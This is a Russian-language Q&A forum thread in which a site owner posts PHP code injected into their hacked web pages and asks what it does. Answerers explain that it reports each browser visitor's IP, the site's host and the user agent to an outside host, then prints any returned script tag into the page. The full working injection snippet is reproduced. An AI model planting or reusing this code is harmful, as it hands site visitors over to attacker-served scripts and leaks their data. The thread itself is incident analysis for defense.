Несанкционированный код, размещенный на веб-страницах

недавно веб-сайт, с которым я был связан, был взломан с несанкционированным кодом, размещенным на нескольких страницах. Мне просто интересно, может ли кто-нибудь пролить свет на то, что именно делает этот код, и какая польза будет для пользователя, который разместил его на этих страницах.

<?php
#31e3cd#
error_reporting(0); ini_set('display_errors',0); $wp_okpbo35639 = @$_SERVER['HTTP_USER_AGENT'];
if (( preg_match ('/Gecko|MSIE/i', $wp_okpbo35639) && !preg_match ('/bot/i', $wp_okpbo35639))){
$wp_okpbo0935639="http://"."html"."-href".".com/href"."/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_okpbo35639);
$ch = curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_okpbo0935639);
curl_setopt ($ch, CURLOPT_TIMEOUT, 6); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $wp_35639okpbo =   curl_exec ($ch); curl_close($ch);}
if ( substr($wp_35639okpbo,1,3) === 'scr' ){ echo $wp_35639okpbo; }
#/31e3cd#
?>

выше приведен код, как он появился на страницах. Я играл с этим кодом и, похоже, получаю информацию о пользователе, используя:

$_SERVER['HTTP_USER_AGENT']

затем он объединяется в url-адрес аналогично приведенному ниже, но с информацией о пользователе сверху, добавленной в url

http://html-href.com/href/?ip=::1&referer=localhost&ua=

Я знаю, что curl используется при передаче данных, но где именно эта информация отправляется и какова ее цель?

2 ответов


код вызывает URL-адрес, который вы отметили, отправляя по IP-адресу пользователя, домену вашего сайта и строке useragent пользователя. Затем он печатает на вашем сайте любой код, который он получает от запроса cURL. Полученный код может быть любым. Это может быть HTML, JavaScript или любой другой код на стороне клиента. Это, вероятно, не серверный код, так как нет eval() запуск полученного кода.

похоже, что он предназначен для браузеров Internet Explorer, Chrome и FireFox, но не искатели / боты.

редактировать: As FDL указал в своем комментарии, это, кажется, печатать только, если он получает строку, где второй, третий и четвертый символы scr, что означает, что он, вероятно, печатает только на странице, если он получил <script> тег.


$_SERVER ['HTTP_USER_AGENT'] используется для проверки типа веб-браузера (или может быть искателем), из которого клиент запрашивает ресурс на основе URL-адреса. Например, с этим фрагментом preg_match ('/Gecko|MSIE/i', $wp_okpbo35639), Он используется для проверки, является ли клиентский браузер Firefox (Gecko) или IE(MSIE). Но это не надежный способ определить исходный браузер, поскольку пользовательские агенты могут быть легко изменены или переключены.